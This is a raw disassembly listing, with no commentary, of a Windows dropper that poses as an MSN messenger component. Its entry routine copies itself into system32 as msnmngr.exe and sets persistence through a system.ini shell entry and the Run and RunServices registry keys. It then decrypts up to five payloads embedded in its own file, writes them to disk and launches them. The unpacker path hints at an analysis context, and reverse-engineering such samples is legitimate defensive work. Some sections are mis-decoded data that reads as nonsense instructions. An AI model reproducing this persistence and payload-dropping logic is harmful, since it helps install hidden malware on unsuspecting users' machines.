loc_400191EC: ; CODE XREF: sub_40019144:loc_400191E4�j
; DATA XREF: sub_40019144+9B�o
pop ebp
retn
sub_40019144 endp
; ---------------------------------------------------------------------------
align 10h
loc_400191F0: ; DATA XREF: .text:4001838C�o
sub ds:dword_4001F2C4, 1
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_400191F8 proc near ; DATA XREF: .text:40018394�o
push ebp
mov ebp, esp
xor eax, eax
push ebp
push offset loc_40019281
push dword ptr fs:[eax]
mov fs:[eax], esp
sub ds:dword_4001F2D0, 1
jnb short loc_40019273
call sub_40013E14
mov eax, offset sub_40013ECC
call sub_40006094
mov dl, 1
mov eax, ds:off_40007908
call sub_4000C69C
mov edx, eax
test edx, edx
jz short loc_40019236
sub edx, 0FFFFFFD4h
loc_40019236: ; CODE XREF: sub_400191F8+39�j
mov eax, offset dword_4001F2C8
call sub_4000621C
mov dl, 1
mov eax, ds:off_40013214
call sub_400133D4
mov ds:dword_4001F2D8, eax
mov dl, 1
mov eax, ds:off_400130A4
call sub_4001394C
mov ds:dword_4001F2D4, eax
mov dl, 1
mov eax, ds:off_400130A4
call sub_4001394C
mov ds:dword_4001F2E0, eax
loc_40019273: ; CODE XREF: sub_400191F8+18�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_40019288
loc_40019280: ; CODE XREF: sub_400191F8+8E�j
retn
; ---------------------------------------------------------------------------
loc_40019281: ; DATA XREF: sub_400191F8+6�o
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_40019280
; ---------------------------------------------------------------------------
loc_40019288: ; CODE XREF: sub_400191F8:loc_40019280�j
; DATA XREF: sub_400191F8+83�o
pop ebp
retn
sub_400191F8 endp
; ---------------------------------------------------------------------------
align 4
loc_4001928C: ; DATA XREF: .text:4001839C�o
sub ds:dword_4001F2FC, 1
retn
; ---------------------------------------------------------------------------
loc_40019294: ; DATA XREF: .text:400183A4�o
sub ds:dword_4001F300, 1
retn
; ---------------------------------------------------------------------------
byte_4001929C db 83h, 2Dh ; DATA XREF: .text:400183B4�o
dd offset dword_4001F308
dw 0F01h
db 83h, 0EDh, 0
align 4
dd 0C632E800h
db 2 dup(0FFh), 68h
dd offset dword_4001F320
db 0E8h
dd 0FFFED328h
db 68h
dd offset dword_4001F338
db 0E8h, 1Eh, 0D3h
dd 76AFFFEh, 0FED3E7E8h
; ---------------------------------------------------------------------------
jmp ds:dword_4001F310[ebx]
; ---------------------------------------------------------------------------
dw 56Ah
dd 0FED3DBE8h
; ---------------------------------------------------------------------------
jmp ds:dword_4001F314[ebx]
; ---------------------------------------------------------------------------
dw 0D6Ah
dd 0FED3CFE8h
; ---------------------------------------------------------------------------
jmp ds:dword_4001F318[ebx]
; ---------------------------------------------------------------------------
dw 68h
dd 6A00007Fh, 0D43EE800h
db 0FEh, 0FFh, 0A3h
dd offset dword_4001F31C
db 0E8h
dd 0FFFFC660h, 30B966h
db 0B2h, 1, 0A1h
dd offset off_400147BC
db 0E8h
dd 0FFFFB584h
db 0A3h
dd offset dword_4001F350
db 66h, 0B9h, 10h
dd 0A101B200h
dd offset off_400147BC
dd 0FFB56FE8h
; ---------------------------------------------------------------------------
jmp ds:dword_4001F354[ebx]
; ---------------------------------------------------------------------------
dw 0B966h
dd 1B20010h
db 0A1h
dd offset off_40014824
db 0E8h, 5Ah, 0B5h
db 2 dup(0FFh), 0A3h
dd offset dword_4001F358
db 0B2h
db 1, 0A1h
dd offset off_40015ADC
dw 0F1E8h
; ---------------------------------------------------------------------------
mov edi, 0F360A3FFh
add [eax-4Eh], eax
add ds:off_400130A4[ecx], esp
call sub_4001394C
mov dword_4001AD44, eax
mov dl, 1
mov eax, ds:off_400130A4
call sub_4001394C
mov ds:dword_4001F35C, eax
mov ecx, offset sub_40014D6C
mov edx, offset sub_40014D7C
mov eax, ds:off_40014788
call sub_400135EC
mov ecx, offset loc_40014F40
mov edx, offset loc_40014F50
mov eax, ds:off_400147A0
call sub_400135EC
retn
; ---------------------------------------------------------------------------
align 4
loc_40019398: ; DATA XREF: .text:400183CC�o
sub ds:dword_4001F364, 1
jnb short locret_400193EC
call sub_4001607C
mov eax, offset sub_400166E8
mov edx, off_4001B02C
mov [edx], eax
mov eax, off_4001AEF8
mov dword ptr [eax], offset sub_40016958
mov eax, offset sub_40016180
mov edx, off_4001B054
mov [edx], eax
mov eax, off_4001AED4
cmp byte ptr [eax], 0
jnz short locret_400193EC
mov eax, off_4001AFB8
mov eax, [eax]
mov ds:dword_4001F370, eax
mov eax, off_4001AFB8
mov dword ptr [eax], offset sub_40016A34
locret_400193EC: ; CODE XREF: .itext:4001939F�j
; .itext:400193D3�j
retn
; ---------------------------------------------------------------------------
align 10h
public start
start:
push ebp
mov ebp, esp
mov ecx, 8
loc_400193F8: ; CODE XREF: .itext:400193FD�j
push 0
push 0
dec ecx
jnz short loc_400193F8
push ecx
push ebx
push esi
push edi
mov eax, offset dword_4001830C
call sub_40006474
xor eax, eax
push ebp
push offset loc_40019AD3
push dword ptr fs:[eax]
mov fs:[eax], esp
lea eax, [ebp-18h]
call sub_40017F10
push 0FFh
push offset aCWindowsSystem ; "C:\\WINDOWS\\system32"
call sub_400065B8 ; GetSystemDirectoryA
mov eax, offset aIfb ; "¨f¡"
mov edx, offset aCWindowsSystem ; "C:\\WINDOWS\\system32"
mov ecx, 1C8h
call sub_40004AF4
mov eax, offset aIfb ; "¨f¡"
mov edx, offset dword_40019AEC
call sub_40004B50
push 0
mov eax, ds:dword_40023C78
call sub_40004D48
push eax
lea edx, [ebp-1Ch]
xor eax, eax
call sub_40002FF8
mov eax, [ebp-1Ch]
call sub_40004D48
push eax
call sub_40006500 ; CopyFileA
push offset dword_40019AFC
push offset aExplorer_exeMs ; "Explorer.exe msnmngr.exe"
push offset aShell ; "shell"
push offset aBoot ; "boot"
call sub_40006668 ; WritePrivateProfileStringA
push 100h
push offset aCWindowsSyst_0 ; "C:\\WINDOWS\\system32"
call sub_400065B8 ; GetSystemDirectoryA
mov dl, 1
mov eax, ds:off_4001404C
call sub_4001414C
mov ebx, eax
mov edx, 80000002h
mov eax, ebx
call sub_400141EC
mov cl, 1
mov edx, offset aSoftwareMicr_0 ; "Software\\Microsoft\\Windows\\CurrentVersi"...
mov eax, ebx
call sub_40014250
test al, al
jz short loc_400194FC
lea eax, [ebp-20h]
mov edx, offset aCWindowsSyst_0 ; "C:\\WINDOWS\\system32"
mov ecx, 100h
call sub_40004AF4
lea eax, [ebp-20h]
mov edx, offset dword_40019B74
call sub_40004B50
mov ecx, [ebp-20h]
mov edx, offset aMsnmgnr ; "msnmgnr"
mov eax, ebx
call sub_400145A4
loc_400194FC: ; CODE XREF: .itext:400194CC�j
mov eax, ebx
call sub_400141BC
mov dl, 1
mov eax, ds:off_4001404C
call sub_4001414C
mov ebx, eax
mov edx, 80000002h
mov eax, ebx
call sub_400141EC
mov cl, 1
mov edx, offset aSoftwareMicr_1 ; "Software\\Microsoft\\Windows\\CurrentVersi"...
mov eax, ebx
call sub_40014250
test al, al
jz short loc_4001955D
lea eax, [ebp-24h]
mov edx, offset aCWindowsSyst_0 ; "C:\\WINDOWS\\system32"
mov ecx, 100h
call sub_40004AF4
lea eax, [ebp-24h]
mov edx, offset dword_40019B74
call sub_40004B50
mov ecx, [ebp-24h]
mov edx, offset aMsnmgnr ; "msnmgnr"
mov eax, ebx
call sub_400145A4
loc_4001955D: ; CODE XREF: .itext:4001952D�j
mov eax, ebx
call sub_400141BC
call sub_400171BC
call sub_400173FC
mov eax, offset aCM_unpackerPac ; "C:\\m_unpacker\\packed.exe"
xor ecx, ecx
mov edx, 104h
call sub_40003580
push 104h
push offset aCM_unpackerPac ; "C:\\m_unpacker\\packed.exe"
push 0
call ds:dword_4001F3AC ; GetModuleFileNameA
mov edx, offset aStr ; "STR"
mov eax, offset dword_4001F960
call sub_40016F88
test eax, eax
jz loc_40019AB8
mov edx, offset dword_4001F964
mov ecx, ds:dword_4001F960
call sub_40002DFC
mov eax, ds:dword_40023B1C
mov edx, eax
mov eax, offset dword_4001F94C
call sub_40004F74
mov eax, offset dword_4001F94C
call sub_40004DA0
mov edx, eax
mov eax, offset dword_4001F964
mov ecx, ds:dword_40023B1C
call sub_40002DFC
push ds:dword_40023B50
push ds:dword_40023B4C
push ds:dword_40023B58
push ds:dword_40023B54
lea edx, [ebp-28h]
mov eax, ds:dword_40023B1C
call sub_40016CE8
mov edx, [ebp-28h]
mov ecx, offset dword_4001F94C
mov eax, ds:dword_4001F94C
call sub_40006A2C
mov eax, offset dword_40023B64
xor ecx, ecx
mov edx, 4
call sub_40003580
xor eax, eax
mov ds:dword_40023B64, eax
mov esi, offset byte_4001F9A5
mov edi, offset dword_40023B24
mov dword ptr [ebp-14h], offset byte_4001FA13
mov ebx, offset dword_4001F6E4
loc_4001964B: ; CODE XREF: .itext:40019AB2�j
mov eax, offset dword_4001F958
xor ecx, ecx
mov edx, 4
call sub_40003580
cmp byte ptr [esi], 0
jz loc_40019A95
mov eax, [edi]
mov edx, eax
mov eax, offset dword_4001F950
call sub_40004F74
mov eax, offset dword_4001F950
call sub_40004DA0
mov edx, eax
mov ecx, [edi]
mov eax, esi
call sub_40002DFC
push ds:dword_40023B50
push ds:dword_40023B4C
push ds:dword_40023B58
push ds:dword_40023B54
mov ecx, offset dword_4001F950
mov edx, ds:dword_4001F94C
mov eax, ds:dword_4001F950
call sub_40006A2C
mov eax, offset dword_4001F954
mov edx, [ebp-14h]
mov ecx, 81h
call sub_40004AF4
push ds:dword_40023B50
push ds:dword_40023B4C
push ds:dword_40023B58
push ds:dword_40023B54
mov ecx, offset dword_4001F954
mov edx, ds:dword_4001F94C
mov eax, ds:dword_4001F954
call sub_40006A2C
xor eax, eax
mov ds:dword_4001F95C, eax
mov eax, ds:dword_4001F950
call sub_40004D48
mov edx, eax
mov eax, offset dword_4001F95C
call sub_40016F88
mov [ebx], eax
mov eax, offset dword_4001F958
mov edx, ds:dword_4001F95C
call sub_40004F74
cmp dword ptr [ebx], 0
jz loc_40019AB8
mov eax, ds:dword_4001F958
mov ds:dword_40023E48, eax
cmp ds:dword_40023E48, 0
jz short loc_4001974E
mov eax, ds:dword_40023E48
sub eax, 4
mov eax, [eax]
mov ds:dword_40023E48, eax
loc_4001974E: ; CODE XREF: .itext:4001973D�j
mov eax, offset dword_4001F958
call sub_40004DA0
mov edx, eax
mov eax, [ebx]
mov ecx, ds:dword_40023E48
call sub_40002DFC
push ds:dword_40023B50
push ds:dword_40023B4C
push ds:dword_40023B58
push ds:dword_40023B54
mov ecx, offset dword_4001F958
mov edx, ds:dword_4001F94C
mov eax, ds:dword_4001F958
call sub_40006A2C
lea edx, [ebp-2Ch]
mov eax, ds:dword_4001F958
call sub_40016D80
mov edx, [ebp-2Ch]
mov eax, offset dword_4001F958
call sub_400048D8
cmp ds:byte_40023B5D, 0
jz short loc_400197E0
mov eax, ds:dword_4001F958
push eax
lea eax, [ebp-34h]
push eax
call sub_40016B44
mov eax, [ebp-34h]
push eax
lea eax, [ebp-30h]
push eax
call sub_40016C04
mov edx, [ebp-30h]
mov eax, offset dword_4001F958
call sub_400048D8
loc_400197E0: ; CODE XREF: .itext:400197B5�j
cmp ds:byte_40023B5C, 0
jz short loc_4001985D
mov eax, ds:dword_4001F958
test eax, eax
jz short loc_400197F7
sub eax, 4
mov eax, [eax]
loc_400197F7: ; CODE XREF: .itext:400197F0�j
call sub_40002C20
mov ds:dword_4001F5C8, eax
mov eax, ds:dword_4001F958
mov ds:dword_40023E4C, eax
cmp ds:dword_40023E4C, 0
jz short loc_40019823
mov eax, ds:dword_40023E4C
sub eax, 4
mov eax, [eax]
mov ds:dword_40023E4C, eax
loc_40019823: ; CODE XREF: .itext:40019812�j
mov eax, offset dword_4001F958
call sub_40004DA0
mov edx, ds:dword_4001F5C8
mov ecx, ds:dword_40023E4C
call sub_40002DFC
mov edx, ds:dword_4001F954
mov eax, ds:dword_4001F5C8
call sub_40017A1C
mov eax, ds:dword_4001F5C8
call sub_40002C3C
jmp loc_40019A95
; ---------------------------------------------------------------------------
loc_4001985D: ; CODE XREF: .itext:400197E7�j
push offset dword_4001F5CC
lea eax, [ebp-38h]
mov edx, offset word_4001F9D2
mov ecx, 41h
call sub_40004AF4
mov eax, [ebp-38h]
push eax
mov eax, ds:dword_40023B14
mov ecx, eax
mov edx, 1
pop eax
call sub_40004DA8
push ds:dword_40023B50
push ds:dword_40023B4C
push ds:dword_40023B58
push ds:dword_40023B54
mov ecx, offset dword_4001F5CC
mov edx, ds:dword_4001F94C
mov eax, ds:dword_4001F5CC
call sub_40006A2C
mov ds:dword_4001F5D0, 104h
mov eax, ds:dword_4001F5D0
push eax
push offset dword_4001F5D4
mov eax, ds:dword_4001F5CC
call sub_40004D48
push eax
call sub_40006578 ; GetEnvironmentVariableA
mov ds:dword_4001F5D0, eax
cmp ds:dword_4001F5D0, 0
jle short loc_4001994D
mov eax, offset dword_4001F5CC
mov edx, ds:dword_4001F5D0
call sub_40004F74
mov eax, offset dword_4001F5CC
call sub_40004DA0
mov edx, eax
mov eax, offset dword_4001F5D4
mov ecx, ds:dword_4001F5D0
call sub_40002DFC
push ds:dword_4001F5CC
push offset dword_40019BE0
mov eax, 64h
call sub_40003080
lea edx, [ebp-3Ch]
call sub_40016CE8
push dword ptr [ebp-3Ch]
push offset dword_40019BEC
mov eax, offset dword_4001F5CC
mov edx, 4
call sub_40004C08
jmp short loc_400199A6
; ---------------------------------------------------------------------------
loc_4001994D: ; CODE XREF: .itext:400198E9�j
mov eax, ds:dword_4001F5CC
test eax, eax
jz short loc_4001995B
sub eax, 4
mov eax, [eax]
loc_4001995B: ; CODE XREF: .itext:40019954�j
mov edx, ds:dword_4001F5CC
cmp byte ptr [edx+eax-1], 5Ch
jz short loc_40019977
mov eax, offset dword_4001F5CC
mov edx, offset dword_40019BE0
call sub_40004B50
loc_40019977: ; CODE XREF: .itext:40019966�j
push ds:dword_4001F5CC
mov eax, 64h
call sub_40003080
lea edx, [ebp-40h]
call sub_40016CE8
push dword ptr [ebp-40h]
push offset dword_40019BEC
mov eax, offset dword_4001F5CC
mov edx, 3
call sub_40004C08
loc_400199A6: ; CODE XREF: .itext:4001994B�j
xor eax, eax
mov ds:dword_4001F6E0, eax
lea eax, [ebp-44h]
mov edx, offset aCM_unpackerPac ; "C:\\m_unpacker\\packed.exe"
mov ecx, 105h
call sub_40004AF4
mov eax, [ebp-44h]
mov ecx, offset dword_4001F6E0
mov edx, offset dword_4001F6DC
call sub_40017D84
mov edx, ds:dword_4001F5CC
mov eax, offset dword_4001F6F8
call sub_40003328
mov edx, 1
mov eax, offset dword_4001F6F8
call sub_40003724
call sub_40002D5C
mov eax, ds:dword_4001F958
mov ds:dword_40023E50, eax
cmp ds:dword_40023E50, 0
jz short loc_40019A17
mov eax, ds:dword_40023E50
sub eax, 4
mov eax, [eax]
mov ds:dword_40023E50, eax
loc_40019A17: ; CODE XREF: .itext:40019A06�j
push 0
mov eax, offset dword_4001F958
call sub_40004DA0
mov edx, eax
mov ecx, ds:dword_40023E50
mov eax, offset dword_4001F6F8
call sub_4000347C
call sub_40002D5C
cmp ds:dword_4001F6E0, 0
jbe short loc_40019A60
push 0
mov edx, ds:dword_4001F6DC
mov ecx, ds:dword_4001F6E0
mov eax, offset dword_4001F6F8
call sub_4000347C
call sub_40002D5C
loc_40019A60: ; CODE XREF: .itext:40019A41�j
mov eax, offset dword_4001F6F8
call sub_4000349C
call sub_40002D5C
push 1
push 0
mov eax, ds:dword_4001F954
call sub_40004D48
push eax
mov eax, ds:dword_4001F5CC
call sub_40004D48
push eax
push offset aOpen ; "open"
push 0
call sub_40016CE0 ; ShellExecuteA
loc_40019A95: ; CODE XREF: .itext:4001965F�j
; .itext:40019858�j
inc ds:dword_40023B64
add ebx, 4
add dword ptr [ebp-14h], 81h
add edi, 8
add esi, 5
cmp ds:dword_40023B64, 5
jnz loc_4001964B
loc_40019AB8: ; CODE XREF: .itext:400195A2�j
; .itext:40019726�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_40019ADA
loc_40019AC5: ; CODE XREF: .itext:40019AD8�j
lea eax, [ebp-44h]
mov edx, 0Ch
call sub_400048A8
retn
; ---------------------------------------------------------------------------
loc_40019AD3: ; DATA XREF: .itext:40019410�o
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_40019AC5
; ---------------------------------------------------------------------------
loc_40019ADA: ; CODE XREF: .itext:40019AD2�j
; DATA XREF: .itext:40019AC0�o
pop edi
pop esi
pop ebx
call sub_40004790
; ---------------------------------------------------------------------------
align 4
dd 0FFFFFFFFh, 0Ch
dword_40019AEC dd 6E736D5Ch, 72676E6Dh, 6578652Eh, 0dword_40019AFC dd 74737973h, 692E6D65h, 696EhaExplorer_exeMs db 'Explorer.exe msnmngr.exe',0 ; DATA XREF: .itext:4001947F�o
align 4
aShell db 'shell',0 ; DATA XREF: .itext:40019484�o
align 4
aBoot db 'boot',0 ; DATA XREF: .itext:40019489�o
align 4
dd 0FFFFFFFFh, 2Dh
aSoftwareMicr_0 db 'Software\Microsoft\Windows\CurrentVersion\Run',0
; DATA XREF: .itext:400194BE�o
align 4
dd 0FFFFFFFFh, 0Ch
dword_40019B74 dd 6E736D5Ch, 726E676Dh, 6578652Eh, 0 ; .itext:40019544�o
dd 0FFFFFFFFh, 7
aMsnmgnr db 'msnmgnr',0 ; DATA XREF: .itext:400194F0�o
; .itext:40019551�o
dd 0FFFFFFFFh, 35h
aSoftwareMicr_1 db 'Software\Microsoft\Windows\CurrentVersion\RunServices',0
; DATA XREF: .itext:4001951F�o
align 4
aStr db 'STR',0 ; DATA XREF: .itext:40019591�o
dd 0FFFFFFFFh, 1
dword_40019BE0 dd 5Ch, 0FFFFFFFFh, 4 ; .itext:4001996D�o
dword_40019BEC dd 6578652Eh, 0 ; .itext:40019992�o
aOpen db 'open',0 ; DATA XREF: .itext:40019A89�o
align 4
dd ?
_itext ends
; Section 3. (virtual address 0001A000)
; Virtual size : 000010D8 ( 4312.)
; Section size in file : 000010D8 ( 4312.)
; Offset to raw data for section: 0001A000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_data segment para public 'DATA' use32
assume cs:_data
;org 4001A000h
dword_4001A000 dd 0 ; sub_400046D4+2�w ...
dword_4001A004 dd 0 ; sub_40004670+36�r ...
dword_4001A008 dd 4FBC33CDh ; sub_40003058+1D�w ...
byte_4001A00C db 2 ; DATA XREF: sub_40003644+4E�r
; .itext:40019012�w
db 8Dh, 40h, 0
off_4001A010 dd offset sub_4000E3EC ; DATA XREF: sub_400052FC�r
; sub_400052FC+9�r ...
off_4001A014 dd offset sub_400127B8 ; DATA XREF: .data:off_4001AEE4�o
off_4001A018 dd offset sub_4000E700 ; DATA XREF: sub_4000540C�r
; sub_4000540C+9�r ...
off_4001A01C dd offset sub_400116DC ; DATA XREF: .data:off_4001B0B4�o
off_4001A020 dd offset sub_40011DFC ; DATA XREF: .data:off_4001B024�o
word_4001A024 dw 1332h ; DATA XREF: sub_40003B94+6�r
; sub_40003B94:loc_40003C0C�r ...
dw 0C08Bh
byte_4001A028 db 0 ; DATA XREF: sub_40003FE8�r
; sub_40004004�r ...
db 8Dh, 40h, 0
byte_4001A02C db 0 ; DATA XREF: sub_400040D8+52�r
; sub_400040D8:loc_40004165�r
db 8Dh, 40h, 0
byte_4001A030 db 0 ; DATA XREF: sub_40004704:loc_40004765�r
db 8Dh, 40h, 0
byte_4001A034 db 1 ; DATA XREF: sub_40003328+23�r
db 8Dh, 40h, 0
off_4001A038 dd offset dword_4001A7B4 ; DATA XREF: sub_40005C08+5�r
; sub_40006184�r ...
dword_4001A03C dd 0A24E60h ; sub_400060A4+18�w ...
off_4001A040 dd offset aFastmmBorlandE ; DATA XREF: sub_40006350+3C�o
; "FastMM Borland Edition © 2004, 2005 Pie"...
byte_4001A044 db 0, 0FFh ; DATA XREF: sub_40001734+21�o
; sub_400023F4+11�o ...
word_4001A046 dw 10h ; DATA XREF: sub_40002540+17B�o
; sub_400029B8+6�o
dd 0A24CE0h, 0A24EE0h, 0A2C000h, 2 dup(0A24CE0h), 73300B30h
off_4001A060 dd offset sub_4000134C ; DATA XREF: sub_400029FC+8�o
dd 18FF00h, 0A2C010h, 0A2C408h, 0A33328h, 2 dup(0A2C010h)
dd 73300B30h
dd offset sub_40001360
dd 20FF00h, 0A3A670h, 0A3AAB0h, 0A41980h, 2 dup(0A3A670h)
dd 73300B30h
dd offset sub_40001380
dd 28FF00h, 0A419A0h, 0A41D58h, 0A48CA8h, 2 dup(0A419A0h)
dd 73300B30h
dd offset sub_400013AC
dd 30FF00h, 0A48CD0h, 0A48E10h, 0A4FFD0h, 2 dup(0A48CD0h)
dd 73300B30h
dd offset sub_400013CC
dd 38FF00h, 4001A0E4h, 0A33440h, 0A3A638h, 0A33340h, 4001A0E4h
dd 73300B30h
dd offset sub_400013F0
dd 40FF00h, 4001A104h, 986AC0h, 0
dd 986A60h, 4001A104h, 73300B30h
dd offset sub_4000141C
dd 48FF00h, 4001A124h, 0A1DAA8h, 0A24C98h, 0A1D9B0h, 4001A124h
dd 73300B30h
dd offset sub_4000144C
dd 50FF00h, 4001A144h, 0A062B0h, 0
dd 0A06240h, 4001A144h, 73300B30h, 40001484h, 58FF00h
dd 4001A164h, 9BDB38h, 0
dword_4001A174 dd 9B4220h, 4001A164h, 73300B30h, 40001484h, 60FF00h, 4001A184h
dd 0A167C0h, 0A1D950h, 0A16680h, 4001A184h, 73300B30h
dd 40001484h, 68FF00h, 4001A1A4h, 1, 2 dup(0)
dd offset dword_4001A174+30h
dword_4001A1BC dd 73300B30h, 40001484h, 70FF00h, 4001A1C4h, 1, 2 dup(0)
; DATA XREF: .data:4001A1D8�o
dd offset dword_4001A1BC+8
dword_4001A1DC dd 73300B30h, 40001484h, 78FF00h, 4001A1E4h, 1, 2 dup(0)
; DATA XREF: .data:4001A1F8�o
dd offset dword_4001A1DC+8
dword_4001A1FC dd 73300B30h, 40001484h, 80FF00h, 4001A204h, 1, 2 dup(0)
; DATA XREF: .data:4001A218�o
dd offset dword_4001A1FC+8
dword_4001A21C dd 73300B30h, 40001484h, 88FF00h, 4001A224h, 1, 2 dup(0)
; DATA XREF: .data:4001A238�o
dd offset dword_4001A21C+8
dword_4001A23C dd 73300B30h, 40001484h, 90FF00h, 4001A244h, 1, 2 dup(0)
; DATA XREF: .data:4001A258�o
dd offset dword_4001A23C+8
dword_4001A25C dd 73300B30h, 40001484h, 98FF00h, 4001A264h, 1, 2 dup(0)
; DATA XREF: .data:4001A278�o
dd offset dword_4001A25C+8
dd 73300B30h, 40001484h, 0A0FF00h, 4001A284h, 98DE50h
dd 0
dword_4001A294 dd 98DD90h, 4001A284h, 73300B30h, 40001484h, 0B0FF00h
dd 4001A2A4h, 1, 2 dup(0)
dd offset dword_4001A294+10h
dword_4001A2BC dd 73300B30h, 40001484h, 0C0FF00h, 4001A2C4h, 1, 2 dup(0)
; DATA XREF: .data:4001A2D8�o
dd offset dword_4001A2BC+8
dword_4001A2DC dd 73300B30h, 40001484h, 0D0FF00h, 4001A2E4h, 1, 2 dup(0)
; DATA XREF: .data:4001A2F8�o
dd offset dword_4001A2DC+8
dword_4001A2FC dd 73300B30h, 40001484h, 0E0FF00h, 4001A304h, 1, 2 dup(0)
; DATA XREF: .data:4001A318�o
dd offset dword_4001A2FC+8
dword_4001A31C dd 73300B30h, 40001484h, 0F0FF00h, 4001A324h, 1, 2 dup(0)
; DATA XREF: .data:4001A338�o
dd offset dword_4001A31C+8
dword_4001A33C dd 73300B30h, 40001484h, 100FF00h, 4001A344h, 1, 2 dup(0)
; DATA XREF: .data:4001A358�o
dd offset dword_4001A33C+8
dword_4001A35C dd 73300B30h, 40001484h, 110FF00h, 4001A364h, 1, 2 dup(0)
; DATA XREF: .data:4001A378�o
dd offset dword_4001A35C+8
dword_4001A37C dd 73300B30h, 40001484h, 120FF00h, 4001A384h, 1, 2 dup(0)
; DATA XREF: .data:4001A398�o
dd offset dword_4001A37C+8
dword_4001A39C dd 73300B30h, 40001484h, 130FF00h, 4001A3A4h, 1, 2 dup(0)
; DATA XREF: .data:4001A3B8�o
dd offset dword_4001A39C+8
dword_4001A3BC dd 72300B30h, 40001484h, 140FF00h, 4001A3C4h, 1, 2 dup(0)
; DATA XREF: .data:4001A3D8�o
dd offset dword_4001A3BC+8
dd 73300B30h, 40001484h, 160FF00h, 4001A3E4h, 986BE0h
dd 0
dd 986A60h, 4001A3E4h, 73300B30h, 40001484h, 180FF00h
dd 4001A404h, 9E7FC0h, 0
dword_4001A414 dd 9E7E20h, 4001A404h, 72300B30h, 40001484h, 1A0FF00h
dd 4001A424h, 1, 2 dup(0)
dd offset dword_4001A414+10h
dword_4001A43C dd 72300B30h, 40001484h, 1C0FF00h, 4001A444h, 1, 2 dup(0)
; DATA XREF: .data:4001A458�o
dd offset dword_4001A43C+8
dword_4001A45C dd 72300B30h, 40001484h, 1E0FF00h, 4001A464h, 1, 2 dup(0)
; DATA XREF: .data:4001A478�o
dd offset dword_4001A45C+8
dword_4001A47C dd 73300B30h, 40001484h, 210FF00h, 4001A484h, 1, 2 dup(0)
; DATA XREF: .data:4001A498�o
dd offset dword_4001A47C+8
dword_4001A49C dd 72300B30h, 40001484h, 240FE00h, 4001A4A4h, 1, 2 dup(0)
; DATA XREF: .data:4001A4B8�o
dd offset dword_4001A49C+8
dword_4001A4BC dd 73302B30h, 40001484h, 270FE00h, 4001A4C4h, 1, 2 dup(0)
; DATA XREF: .data:4001A4D8�o
dd offset dword_4001A4BC+8
dword_4001A4DC dd 75302B30h, 40001484h, 2A0FE00h, 4001A4E4h, 1, 2 dup(0)
; DATA XREF: .data:4001A4F8�o
dd offset dword_4001A4DC+8
dd 7E302B30h, 40001484h, 2E0FE00h, 4001A504h, 98E090h
dd 0
dword_4001A514 dd 98DD90h, 4001A504h, 8A302B30h, 40001484h, 320FE00h
dd 4001A524h, 1, 2 dup(0)
dd offset dword_4001A514+10h
dword_4001A53C dd 96302B30h, 40001484h, 370FE00h, 4001A544h, 1, 2 dup(0)
; DATA XREF: .data:4001A558�o
dd offset dword_4001A53C+8
dword_4001A55C dd 0A5302B30h, 40001484h, 3C0FE00h, 4001A564h, 1, 2 dup(0)
; DATA XREF: .data:4001A578�o
dd offset dword_4001A55C+8
dword_4001A57C dd 0B4302B30h, 40001484h, 420FE00h, 4001A584h, 1, 2 dup(0)
; DATA XREF: .data:4001A598�o
dd offset dword_4001A57C+8
dword_4001A59C dd 0C6302B30h, 40001484h, 480FE00h, 4001A5A4h, 1, 2 dup(0)
; DATA XREF: .data:4001A5B8�o
dd offset dword_4001A59C+8
dword_4001A5BC dd 0D8302B30h, 40001484h, 4F0FC00h, 4001A5C4h, 1, 2 dup(0)
; DATA XREF: .data:4001A5D8�o
dd offset dword_4001A5BC+8
dword_4001A5DC dd 0ED304B30h, 40001484h, 560FC00h, 4001A5E4h, 1, 2 dup(0)
; DATA XREF: .data:4001A5F8�o
dd offset dword_4001A5DC+8
dd 0FD304B30h, 40001484h, 5E0FC00h, 4001A604h, 987060h
dd 0
dword_4001A614 dd 986A60h, 4001A604h, 0FD304B30h, 40001484h, 670FC00h
dd 4001A624h, 1, 2 dup(0)
dd offset dword_4001A614+10h
dword_4001A63C dd 0FB304B30h, 40001484h, 710FC00h, 4001A644h, 1, 2 dup(0)
; DATA XREF: .data:4001A658�o
dd offset dword_4001A63C+8
dword_4001A65C dd 0FF304B30h, 40001484h, 7C0F800h, 4001A664h, 1, 2 dup(0)
; DATA XREF: .data:4001A678�o
dd offset dword_4001A65C+8
dword_4001A67C dd 0F8306B30h, 40001484h, 880F800h, 4001A684h, 1, 2 dup(0)
; DATA XREF: .data:4001A698�o
dd offset dword_4001A67C+8
dword_4001A69C dd 0FF306B30h, 40001484h, 950F800h, 4001A6A4h, 1, 2 dup(0)
; DATA XREF: .data:4001A6B8�o
dd offset dword_4001A69C+8
dword_4001A6BC dd 0FC306B30h, 40001484h, 0A30F000h, 4001A6C4h, 1, 2 dup(0)
; DATA XREF: .data:4001A6D8�o
dd offset dword_4001A6BC+8
dword_4001A6DC dd 0FF308B30h, 40001484h, 0A30F000h, 4001A6E4h, 1, 2 dup(0)
; DATA XREF: .data:4001A6F8�o
dd offset dword_4001A6DC+8
dword_4001A6FC dd 0FF308B30h, 40001484h, 0A30F000h, 4001A704h, 1, 2 dup(0)
; DATA XREF: .data:4001A718�o
dd offset dword_4001A6FC+8
dd 0FF308B30h, 40001484h
off_4001A724 dd offset sub_40001734 ; DATA XREF: sub_40002C20+4�r
; sub_40002C54+3F�r
off_4001A728 dd offset sub_40001A9C ; DATA XREF: sub_40002C3C+4�r
; sub_40002C54+26�r ...
off_4001A72C dd offset sub_40001C7C ; DATA XREF: sub_40002C54+D�r
off_4001A730 dd offset sub_40002004 ; DATA XREF: sub_40002C08+4�r
dd offset sub_4000235C
dd offset sub_4000239C
byte_4001A73C db 0 ; DATA XREF: sub_40002D04+35�r
aRsu db 'ËÌÈÉ×ÏÈÍÎÛØÚÙÊÜÝÞßàáã',0
aFxn@ db 'äå@',0
dword_4001A758 dd 3 align 10h
dd 1, 2, 3, 3 dup(0)
aError db 'Error',0 ; DATA XREF: sub_40004704+6C�o
dw 0C08Bh
aRuntimeErrorAt db 'Runtime error at 00000000',0 ; DATA XREF: sub_40004670+3�o
; sub_40004704+32�o ...
dw 0C08Bh
byte_4001A7A0 db 30h ; DATA XREF: sub_40004670+41�r
db 31h, 32h, 33h
